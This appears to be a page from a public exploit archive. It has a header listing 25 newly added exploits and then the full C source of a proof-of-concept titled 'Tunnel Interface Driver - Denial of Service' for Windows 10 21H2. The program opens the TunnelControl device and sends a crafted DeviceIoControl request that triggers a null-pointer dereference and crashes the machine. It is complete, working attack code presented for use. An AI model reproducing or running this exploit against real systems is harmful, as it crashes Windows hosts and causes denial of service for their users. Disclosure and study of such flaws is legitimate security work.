
25 changes to exploits/shellcodes/ghdb ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS) Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access ZKTeco ZEM/ZMM 8.88 - Missing Authentication Hashicorp Consul v1.0 - Remote Command Execution (RCE) X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF) OPSWAT Metadefender Core - Privilege Escalation Pega Platform 8.1.0 - Remote Code Execution (RCE) Beauty-salon v1.0 - Remote Code Execution (RCE) BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) iBooking v1.0.8 - Arbitrary File Upload Jetpack 11.4 - Cross Site Scripting (XSS) Moodle LMS 4.0 - Cross-Site Scripting (XSS) Online shopping system advanced 1.0 - Multiple Vulnerabilities rukovoditel 3.2.1 - Cross-Site Scripting (XSS) Senayan Library Management System v9.5.0 - SQL Injection Social-Share-Buttons v2.2.3 - SQL Injection Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS) YouPHPTube<= 7.8 - Multiple Vulnerabilities Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF) SuperMailer v11.20 - Buffer overflow DoS Tunnel Interface Driver - Denial of Service VMware Workstation 15 Pro - Denial of Service HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
48 lines
No EOL
1.7 KiB
C
48 lines
No EOL
1.7 KiB
C
// Exploit Title: Tunnel Interface Driver - Denial of Service
|
|
// Date: 07/15/2022
|
|
// Exploit Author: ExAllocatePool2
|
|
// Vendor Homepage: https://www.microsoft.com/
|
|
// Software Link: https://www.microsoft.com/en-us/software-download/windows10
|
|
// Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288)
|
|
// Tested on: Microsoft Windows
|
|
// GitHub Repository: https://github.com/Exploitables/MSRC-1
|
|
|
|
#include <Windows.h>
|
|
#include <stdio.h>
|
|
|
|
#define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl"
|
|
|
|
int main(int argc, char** argv);
|
|
|
|
int main(int argc, char** argv)
|
|
{
|
|
HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0);
|
|
unsigned long long input_output = 0x4242424242424242;
|
|
unsigned long bytes_returned = 0x43434343;
|
|
unsigned char unused = 0;
|
|
|
|
SetConsoleTitleA("https://msrc.microsoft.com/");
|
|
|
|
printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!");
|
|
|
|
if (h_driver == (HANDLE)-1)
|
|
{
|
|
printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %d (0x%x)", GetLastError(), GetLastError());
|
|
unused = getchar();
|
|
return 1;
|
|
}
|
|
printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver);
|
|
|
|
printf("\n[!] Triggering a denial of service via arbitrary read in 3...");
|
|
for (int i = 2; i > 0; i--)
|
|
{
|
|
Sleep(1000);
|
|
printf("\n[!] %d...", i);
|
|
}
|
|
|
|
DeviceIoControl(h_driver, 0, &input_output, 8, &input_output, 8, &bytes_returned, 0);
|
|
|
|
unused = getchar();
|
|
printf("\n[-] Exploit failed. The machine should have crashed.");
|
|
return 0;
|
|
} |